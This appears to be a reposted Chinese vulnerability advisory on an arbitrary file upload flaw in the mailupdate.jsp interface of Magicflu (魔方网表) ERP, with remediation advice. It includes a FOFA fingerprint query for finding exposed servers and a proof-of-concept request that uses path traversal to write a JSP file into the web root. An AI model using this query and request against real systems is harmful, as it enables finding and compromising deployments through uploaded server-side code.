一、漏洞简述
魔方网表ERP是一款高效、灵活的企业资源规划解决方案,旨在帮助企业实现数智化转型,消除信息孤岛,打造全程一体化的管理体系。魔方网表ERP拥有强大的表单功能和模块化的产品特点,魔方网表ERP能够无缝对接外部系统,打破信息壁垒,实现业务跨部门间并行协作,提高工作效率。魔方网表ERP还具有自定义审批流和报表分析功能,能够帮助企业实现业务流程的标准化、智能化,以及多维度数据分析,为管理决策提供有力支持。魔方网表mailupdate.jsp接口存在任意文件上传漏洞。
二、网络测绘
fofa:icon_hash="694014318"
三、漏洞复现
四、漏洞检测poc
/magicflu/html/mail/mailupdate.jsp?messageid=/../../../test3.jsp&messagecontent=test123
/magicflu/test3.jsp
五、漏洞修复
1、限制mailupdate接口的访问。
2、升级魔方网表ERP至最新版本。
3、官网下载最新补丁版本:https://www.mf999.com/erp.html
原文始发于微信公众号(实战安全研究):漏洞复现 | 魔方网表存在文件上传漏洞【附poc】
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论